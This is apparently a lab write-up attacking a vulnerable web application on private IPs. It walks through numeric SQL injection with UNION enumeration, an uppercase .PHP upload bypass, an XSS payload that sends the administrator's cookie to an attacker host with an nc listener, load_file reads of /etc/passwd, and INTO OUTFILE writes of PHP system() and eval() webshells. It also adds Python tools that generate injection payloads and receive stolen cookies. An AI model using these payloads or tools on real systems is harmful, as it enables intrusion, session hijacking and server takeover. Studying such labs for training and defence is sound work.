Experiment 5

SQLi

Discover possible injection points

Attempt to verify injection

Based on the following tests:

http://192.168.35.128/cat.php?id=1' or 1=1%23 returns a database error. The single quote breaks the SQL syntax, so the parameter is not wrapped in quotes: this is a numeric (non-string) injection rather than a string injection.

http://192.168.35.128/cat.php?id=1 and 1=1 renders normally

http://192.168.35.128/cat.php?id=1 and 1=2 renders an empty page

The two pages differ only in the truth value of the appended condition, which confirms that there is an injection point here and that it is a numeric injection.

http://192.168.35.128/cat.php?id=1 order by 4 renders normally

http://192.168.35.128/cat.php?id=1 order by 5 errors

So the query behind this page returns only 4 columns. Note that order by counts the columns of the SELECT, not every field of the table; this is the count the UNION below must match.

Find out which columns are echoed to the page (union select with numbered placeholders; the number that shows up in the page marks the display column)

Column 2 is echoed to the page

Get the database name (database())

Get the table names (from information_schema.tables, filtered by table_schema=database())

Get the column names (from information_schema.columns)

Get the data
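The steps above (boolean test, order-by column count, UNION enumeration) are shown in the lab only as URLs and screenshots. As an added example that is not part of the original writeup, the Python below turns them into reusable payload builders for a numeric id parameter; the table and column names passed in are assumptions, since the lab never names them, and the same chain applies to the admin/edit.php injection later on.

```python
from urllib.parse import quote

# Added example, not from the lab writeup: it reproduces the injection
# steps above (boolean test, order-by column count, UNION enumeration)
# as reusable payload builders for a numeric id parameter. The table and
# column names passed in are assumptions; the lab never names them.

BASE = "http://192.168.35.128/cat.php?id="


def inject_url(base, injection):
    """Append the injection to id=1 and percent-encode it. '#' in particular
    must travel as %23: sent raw, the browser treats it as a URL fragment and
    the comment never reaches the server (which is why the lab writes %23)."""
    return base + quote("1" + injection, safe="=,()")


def boolean_pair(base):
    """The 'and 1=1' / 'and 1=2' pair. A page that renders for the first and
    comes back empty for the second means the condition is evaluated by the
    database, i.e. a numeric injection point."""
    return inject_url(base, " and 1=1"), inject_url(base, " and 1=2")


def find_column_count(page_ok, max_cols=32):
    """Linear 'order by N' probing. page_ok(n) must return True when
    'id=1 order by n' renders normally and False on a database error.
    Returns the number of columns in the injected SELECT (what the UNION
    must match), which is not necessarily the number of fields in the table."""
    for n in range(1, max_cols + 1):
        if not page_ok(n):
            return n - 1
    raise ValueError("query has more than %d columns" % max_cols)


def union_payload(base, cols, display_col, expr):
    """'and 1=2' suppresses the genuine row so only the UNION row is shown;
    expr goes into the echoed column and the others stay numeric placeholders."""
    fields = [str(i) for i in range(1, cols + 1)]
    fields[display_col - 1] = expr
    return inject_url(base, " and 1=2 union select " + ",".join(fields) + "#")


def enumeration_chain(base, cols, display_col, table, columns):
    """The four lookups the lab performs, in order: current database, its
    tables, the columns of the table of interest, then the data. group_concat
    folds many rows into the single echoed column. 'table' and 'columns' are
    the hypothetical names learned from the previous steps."""
    return {
        "database": union_payload(base, cols, display_col, "database()"),
        "tables": union_payload(
            base, cols, display_col,
            "(select group_concat(table_name) from information_schema.tables "
            "where table_schema=database())"),
        "columns": union_payload(
            base, cols, display_col,
            "(select group_concat(column_name) from information_schema.columns "
            "where table_name='%s')" % table),
        "data": union_payload(
            base, cols, display_col,
            "(select group_concat(%s) from %s)" % (",0x3a,".join(columns), table)),
    }


if __name__ == "__main__":
    # Stand-in for the real page: pretend the query has 4 columns, like the lab.
    cols = find_column_count(lambda n: n <= 4)
    for url in boolean_pair(BASE):
        print(url)
    for step, url in enumeration_chain(BASE, cols, 2, "users", ["username", "password"]).items():
        print(step, url)
```

To use it against the lab host, replace the lambda with a function that fetches the order-by URL and reports whether the page rendered, and feed the real table and column names recovered from the "tables" and "columns" steps into the "data" step.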

Log in to the admin back end and upload a webshell. The upload filter blocks the .php extension; renaming the file to an uppercase .PHP extension bypasses the blacklist and the shell still runs, because Apache's mod_mime matches extensions case-insensitively and hands the file to the PHP handler all the same.

XSS (there is no bot in this lab, so the administrator login is simulated manually)

Find possible XSS injection points

Test whether the vulnerability exists

alert(1) pops up, confirming the vulnerability: the input is rendered into the page without encoding

Write the attack payload and start a listener locally

<script>document.write('<img src="http://192.168.243.133/?'+document.cookie+' "/>');</script>

nc -lvnp 80

When the administrator logs in and the payload fires, the administrator's cookie arrives at the listener

Visit the site with that cookie (set it in the browser console with document.cookie="name=value", one statement per cookie) and you are logged in as administrator. This only works because the session cookie is not marked HttpOnly; with HttpOnly set, document.cookie would not have exposed it.
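The lab catches the exfiltrated cookie with a raw nc listener and reads it off the request line by hand. As an added example that is not part of the original writeup, the Python below answers the injected <img> request, parses document.cookie out of the query string and prints the console statements needed to replay it. The listen address and the sample request used to exercise it are constructed for illustration.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote

# Added example, not part of the lab: a receiver for the <img src="http://host/?'+document.cookie+'">
# payload that replaces `nc -lvnp 80`. The listen address is an assumption.

LISTEN = ("0.0.0.0", 80)


def cookies_from_target(request_target):
    """Recover name=value pairs from the request target the payload produces:
    '/?' followed by document.cookie, percent-encoded by the browser.
    document.cookie joins pairs with '; ', so decode first and split on ';'.
    Cookies flagged HttpOnly never appear here, which is the usual reason
    for an empty result even though the script executed."""
    query = request_target.split("?", 1)[1] if "?" in request_target else ""
    pairs = {}
    for part in unquote(query).split(";"):
        part = part.strip()
        if "=" in part:
            name, value = part.split("=", 1)
            pairs[name.strip()] = value.strip()
    return pairs


def replay_statements(cookies):
    """Console lines that set the stolen cookies in your own browser before
    visiting the admin page (the lab's document.cookie="xx" step)."""
    return ['document.cookie="%s=%s"' % (k, v) for k, v in cookies.items()]


class ExfilHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        cookies = cookies_from_target(self.path)
        self.log_message("cookies from %s: %s", self.client_address[0], cookies)
        for line in replay_statements(cookies):
            self.log_message("%s", line)
        # Any response will do: the <img> never needs to render, it only
        # has to make the browser send the request.
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()


if __name__ == "__main__":
    HTTPServer(LISTEN, ExfilHandler).serve_forever()
```

Binding port 80 needs root (or a capability); if you listen elsewhere, change the port in the payload URL to match.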

Then look for an injection point in the admin pages

Verify

and 1=1 renders normally

and 1=2 renders an empty page

which indicates SQL injection

order by shows the query returns 4 columns

Find the display columns: http://192.168.243.135/admin/edit.php?id=2%20and%201=2%20union%20select%201,2,3,4

Columns 2 and 3 are echoed

Read /etc/passwd: http://192.168.243.135/admin/edit.php?id=2%20and%201=2%20union%20select%201,2,load_file(%22/etc/passwd%22),4

Reading /etc/shadow returns nothing. load_file() returns NULL when the MySQL server process cannot read the file, and /etc/shadow is readable only by root, so this is the expected result. (load_file also requires the FILE privilege and, on newer MySQL, is restricted by secure_file_priv; the successful passwd read shows both are satisfied here.)

Look for exposed directory information and try to write a file

http://192.168.179.130/admin/edit.php?id=0%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/classes/test.php%22

Accessing the file gives a 404: the MySQL service account most likely has no write permission to that directory (into outfile also fails if the target file already exists)

Try another directory (the page source references a css directory)

Write the probe file again; this time the file is reachable and echoes the union row

This directory is writable, so arbitrary files can be dropped into the web root

Write a command-execution shell

http://192.168.243.135/admin/edit.php?id=0%20union%20select%201,2,%22%3C?php%20system($_GET[%27a%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/test.php%22

Write a one-line webshell (eval of POST data, for use with a webshell client)

http://192.168.243.135/admin/edit.php?id=0%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27a%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/test4.php%22

The shell is obtained
